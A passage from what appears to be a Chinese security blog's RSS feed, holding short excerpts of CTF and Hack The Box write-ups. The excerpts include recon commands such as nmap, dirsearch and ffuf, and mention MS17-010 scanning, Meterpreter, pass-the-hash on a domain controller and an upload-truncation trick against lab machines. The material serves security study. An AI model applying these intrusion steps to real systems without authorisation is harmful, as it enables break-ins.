&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/images/image-74.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;可以看到存在字符串输入后进行异或，异或是可逆性的&lt;/p&gt;</description>
    </item>
    <item>
      <title>SWPU-Misc</title>
      <link>https://www.hyhforever.top/posts/2024/11/swpu-misc/</link>
      <pubDate>Thu, 21 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/swpu-misc/</guid>
      <description>&lt;h2 id=&#34;少年的ctf奇遇&#34;&gt;少年的ctf奇遇&lt;/h2&gt;
&lt;p&gt;考点：LSB隐写、图片宽高修改&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;题目描述：你说了图片里的一句话，老婆露出了这个表情。
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/swpu-misc/images/image-59.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/swpu-misc/images/image-59.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;lsb隐写原理&#34;&gt;LSB隐写原理&lt;/h3&gt;
&lt;p&gt;LSB即为&lt;strong&gt;最低有效位&lt;/strong&gt;，图片中的图像像素一般是由RGB三原色（红绿蓝）组成&lt;/p&gt;
&lt;p&gt;每一种颜色占用8位，取值范围为0x00~0xFF，即有256种颜色，一共包含了256的3次方的颜色&lt;/p&gt;</description>
    </item>
    <item>
      <title>EP-Win8098</title>
      <link>https://www.hyhforever.top/posts/2024/11/ep-win8098/</link>
      <pubDate>Sun, 17 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/ep-win8098/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;本文是在攻破&lt;code&gt;Windows Server 2016 DC&lt;/code&gt;的基础上对&lt;code&gt;Windows PC 8089&lt;/code&gt;进行攻击&lt;/p&gt;
&lt;h2 id=&#34;信息收集&#34;&gt;信息收集&lt;/h2&gt;
&lt;p&gt;回到&lt;code&gt;WinServer 2016 DC&lt;/code&gt;的&lt;code&gt;Meterpreter&lt;/code&gt;上，进入shell，如果使用了代理导致进不去，请参考前面几篇文章&lt;/p&gt;</description>
    </item>
    <item>
      <title>EP-WinServerCA</title>
      <link>https://www.hyhforever.top/posts/2024/11/ep-winserverca/</link>
      <pubDate>Sun, 17 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/ep-winserverca/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;这个主机毫无新意，这篇文章我都不想写，攻破这个主机的方法和前面&lt;code&gt;8089&lt;/code&gt;是一模一样&lt;/p&gt;
&lt;h2 id=&#34;pth攻击&#34;&gt;PTH攻击&lt;/h2&gt;
&lt;p&gt;按道理来说，拿下域控的&lt;code&gt;Administrator&lt;/code&gt;之后，整个域基本上就可以打穿了。&lt;/p&gt;</description>
    </item>
    <item>
      <title>EP-WinServerDC</title>
      <link>https://www.hyhforever.top/posts/2024/11/ep-winserverdc/</link>
      <pubDate>Sat, 16 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/ep-winserverdc/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;本文是在8086那篇文章已经搭建好代理的情况下进行的&lt;/p&gt;
&lt;h2 id=&#34;漏洞扫描&#34;&gt;漏洞扫描&lt;/h2&gt;
&lt;p&gt;利用web01上的fscan对DC主机进行扫描，发现疑似存在MS17-010漏洞&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/ep-winserverdc/images/image-39.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/ep-winserverdc/images/image-39.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进入MSF，设置全局代理以及反向允许&lt;/p&gt;</description>
    </item>
    <item>
      <title>EP-Win8086</title>
      <link>https://www.hyhforever.top/posts/2024/11/ep-win8086/</link>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/ep-win8086/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;本文是在已经攻破&lt;code&gt;EP-web01&lt;/code&gt;的基础上，对其内网中的Win8086进行攻击，最终获取到其权限&lt;/p&gt;
&lt;h2 id=&#34;漏洞扫描&#34;&gt;漏洞扫描&lt;/h2&gt;
&lt;p&gt;由于上篇文章已经可以远程登录Web01，这里直接上传fscan的&lt;code&gt;windows&lt;/code&gt;版本，并且进行漏扫&lt;/p&gt;</description>
    </item>
    <item>
      <title>EP-Web01</title>
      <link>https://www.hyhforever.top/posts/2024/11/ep-web01/</link>
      <pubDate>Tue, 12 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/ep-web01/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;该靶机是目标局域网内的入口机器，本文目的是拿到Web01的最高权限并且实现远程登录&lt;/p&gt;
&lt;h2 id=&#34;信息收集&#34;&gt;信息收集&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ arp-scan -l
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/ep-web01/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/ep-web01/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;发现存在一台IP值为：&lt;code&gt;192.168.237.139&lt;/code&gt;的主机&lt;/p&gt;</description>
    </item>
    <item>
      <title>极客大挑战2024</title>
      <link>https://www.hyhforever.top/posts/2024/10/geekchallenge2024/</link>
      <pubDate>Thu, 31 Oct 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/10/geekchallenge2024/</guid>
      <description>&lt;h2 id=&#34;100的&#34;&gt;100%的⚪&lt;/h2&gt;
&lt;p&gt;F12审计源码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-22.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-22.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Base64解密&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-23.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-23.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;baby_upload&#34;&gt;baby_upload&lt;/h2&gt;
&lt;p&gt;%00截断，属于nginx解析问题，会把file.ext当作php文件解析&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-24.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-24.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-25.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-25.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;ez_http&#34;&gt;ez_http&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-26.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-26.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-27.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-27.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Cicada</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/</link>
      <pubDate>Mon, 30 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-335.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-335.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;发现靶机存在&lt;code&gt;smb&lt;/code&gt;网络文件共享服务&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-336.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-336.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;使用&lt;code&gt;smbclient&lt;/code&gt;连接，发现以下的目录&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-337.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-cicada/images/image-337.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;并且在HR的目录下发现了一个&lt;code&gt;txt&lt;/code&gt;文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Trickster</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-trickster/</link>
      <pubDate>Sat, 28 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-trickster/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;git-hack&#34;&gt;Git Hack&lt;/h2&gt;
&lt;p&gt;我在trickster的主域名发现了一个shop的子域名网站&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-trickster/images/image-307.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-trickster/images/image-307.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;这个shop看起来像是使用&lt;code&gt;PrestaShop&lt;/code&gt;搭建，我搜索了一下相关的漏洞，无法直接使用&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-TowMillion</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/</link>
      <pubDate>Sat, 21 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/images/image-278.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/images/image-278.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;并且注意到80端口上有一个重定向，添加到&lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/images/image-279.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-towmillion/images/image-279.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;register&#34;&gt;Register&lt;/h2&gt;
&lt;p&gt;注意到有/login路由，使用简单的密码组合登陆失败，猜测存在/register路由&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Solarlab</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/</link>
      <pubDate>Fri, 20 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/images/image-240.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/images/image-240.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;80&lt;/code&gt;、&lt;code&gt;135&lt;/code&gt;、&lt;code&gt;139&lt;/code&gt;、&lt;code&gt;445&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/images/image-241.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-solarlab/images/image-241.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;可以看到存在&lt;strong&gt;smb&lt;/strong&gt;服务（SMB是一种网络文件共享协议）&lt;/p&gt;
&lt;p&gt;尝试使用&lt;code&gt;smbclient&lt;/code&gt;进行连接&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Caption</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-caption/</link>
      <pubDate>Wed, 18 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-caption/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-caption/images/image-221.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-caption/images/image-221.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;、&lt;code&gt;8080&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;caption.htb:80&lt;/code&gt;👇是一个登陆界面&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-caption/images/image-222.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-caption/images/image-222.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;caption.htb:8080&lt;/code&gt;👇注意到是一个&lt;code&gt;Gitbucket&lt;/code&gt;的服务&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Greenhorn</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/</link>
      <pubDate>Tue, 17 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-201.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-201.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-206.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-206.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;找到一些敏感文件&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-205.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-greenhorn/images/image-205.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进入&lt;code&gt;login.php&lt;/code&gt;，发现pluck的版本是&lt;code&gt;4.7.18&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;cve-2023-50564&#34;&gt;CVE-2023-50564&lt;/h2&gt;
&lt;p&gt;查询相关漏洞之后，发现RCE需要先上传文件。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-MonitorsThree</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/</link>
      <pubDate>Thu, 12 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O monitorsthree.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-131.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-131.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;、&lt;code&gt;8084&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Web server：&lt;code&gt;nginx 1.18.0&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dirsearch -u monitorsthree.htb -t 50 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-132.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-132.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;发现：&lt;code&gt;login.php&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-133.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-133.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;subdomain-fuzzing&#34;&gt;Subdomain Fuzzing&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;ffuf -w main.txt -u http://monitorsthree.htb -H &amp;#34;Host:FUZZ.monitorsthree.htb&amp;#34; -ac
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-134.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-monitorsthree/images/image-134.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Blurry</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/</link>
      <pubDate>Wed, 11 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O blurry.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-115.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-115.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Web Server：&lt;code&gt;nginx 1.18.0&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-116.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-116.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;subdomain-fuzzing&#34;&gt;Subdomain Fuzzing&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-117.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-117.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;子域名：&lt;code&gt;app&lt;/code&gt;、&lt;code&gt;files&lt;/code&gt;、&lt;code&gt;chat&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-118.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-blurry/images/image-118.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;app.blurry.htb👇&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Sightless</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/</link>
      <pubDate>Tue, 10 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
